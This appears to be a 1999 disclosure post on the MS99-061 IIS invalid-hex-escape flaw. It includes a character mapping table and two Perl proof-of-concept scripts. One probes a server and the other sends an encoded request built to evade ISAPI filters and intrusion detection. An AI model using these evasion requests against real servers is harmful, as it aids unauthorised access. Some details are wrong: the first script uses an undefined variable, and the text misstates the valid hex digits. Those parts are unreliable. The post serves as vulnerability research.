More info on MS99-061 (IIS escape character vulnerability)

From: .rain.forest.puppy. (rfpat_private)
Date: Wed Dec 29 1999 - 19:39:29 PST

  • Next message: Coolio: "Re: majordomo local exploit"

    I found myself curious on the exact happenings of this vulnerability, so I
    decided to look into it further.  Who knows, maybe another anti-IDS tactic
    for whisker. :)
    Anyways, the problem is that IIS parses invalid hex escape sequences.  For
    instance, %ff, %9a, and %0d are valid since FF, 9A, and 0D are valid
    hexidecimal numbers.  To be valid, it must be two chars only using the
    digits A-Z, a-z, and 0-9.  However, IIS was also allowing things such as
    %qj, %0z, and %g4, which are not valid hexidecimal values.
    So what I did was set out on a quest to find out what parses to what. I
    came up with a rough table of mappings.  The results come from submitting
    '%1?', where '?' is the character who's ascii value is represented below:
    87 -> 0		137 -> i
    88 -> 1		138 -> j
    89 -> 2		139 -> k
    90 -> 3		140 -> l
    91 -> 4		141 -> m
    92 -> 5		142 -> n
    93 -> 6		143 -> o
    94 -> 7		144 -> p
    95 -> 8		145 -> q
    96 -> 9		146 -> r
    129 -> a	147 -> s
    130 -> b	148 -> t
    131 -> c	149 -> u
    132 -> d	150 -> v
    133 -> e	151 -> w
    134 -> f	152 -> x
    135 -> g	153 -> y
    136 -> h	154 -> z
    This table was generated using the first included perl program (below).
    Now, to test it, I used the second perl program included below to make a
    substituted request for 'default.asp'.  The important portion of the perl
    program is:
    $str="%1" . chr(132); # d
    $str.="%1". chr(133); # e
    $str.="%1". chr(134); # f
    $str.="%1". chr(129); # a
    $str.="%1". chr(149); # u
    $str.="%1". chr(140); # l
    $str.="%1". chr(148); # t
    $str.="%1". chr(129); # a
    $str.="%1". chr(147); # s
    $str.="%1". chr(144); # p
    Here we see the request is made up of nothing bug '%1?', where ? is the
    corresponding ascii character.  End result?  It works.
    What does this allow you to bypass?  My guess is anything that plays or
    needs the raw filename or request.  ISAPI filters and extension handlers
    come to mind.  Who, what, where, and how are application specific.
    Just a little bit of geek info.  I saw enough 'can we get more information
    on this' posts that I thought I could shed a little more light on the
    subject.  It was tough tho, with the depth of Microsoft's explanation in
    their advisories. :)
    rain forest puppy
    rfpat_private /
    $|=1; use Socket;
    $inet=inet_aton(''); # webserver to test
    @DXX=(); $val=0;
    while($val++ < 255){
     sendraw("GET /$cval.idc HTTP/1.0\n\n");
     foreach $line (@DXX){
     if($line=~/query file <b>\/([a-zA-Z0-9]+).idc<\/b>/){
      print "$val -> $1\n"; last;}}}
    sub sendraw { my ($pstr)=@_;
     if(!(socket(S,PF_INET,SOCK_STREAM,$PROTO))){ die("socket");}
     if(connect(S,pack "SnA4x8",2,80,$inet)){
      select(S);      $|=1;
      print $pstr;    @DXX=<S>;
      select(STDOUT); close(S);
     } else { die("not responding"); }}
    $|=1; use Socket;
    $inet=inet_aton(''); # webserver to test
    @DXX=(); $val=0;
    $str="%1".chr(132);  # d
    $str.="%1".chr(133); # e
    $str.="%1".chr(134); # f
    $str.="%1".chr(129); # a
    $str.="%1".chr(149); # u
    $str.="%1".chr(140); # l
    $str.="%1".chr(148); # t
    $str.="%1".chr(129); # a
    $str.="%1".chr(147); # s
    $str.="%1".chr(144); # p
    sendraw("GET /$str HTTP/1.0\n\n");
    print @DXX;
    sub sendraw {   # raw network functions stay in here
            my ($pstr)=@_;
            if(!(socket(S,PF_INET,SOCK_STREAM,$PROTO))){ die("socket");}
            if(connect(S,pack "SnA4x8",2,80,$inet)){
                    select(S);      $|=1;
                    print $pstr;    @DXX=<S>;
                    select(STDOUT); close(S);
            } else { die("not responding"); }}

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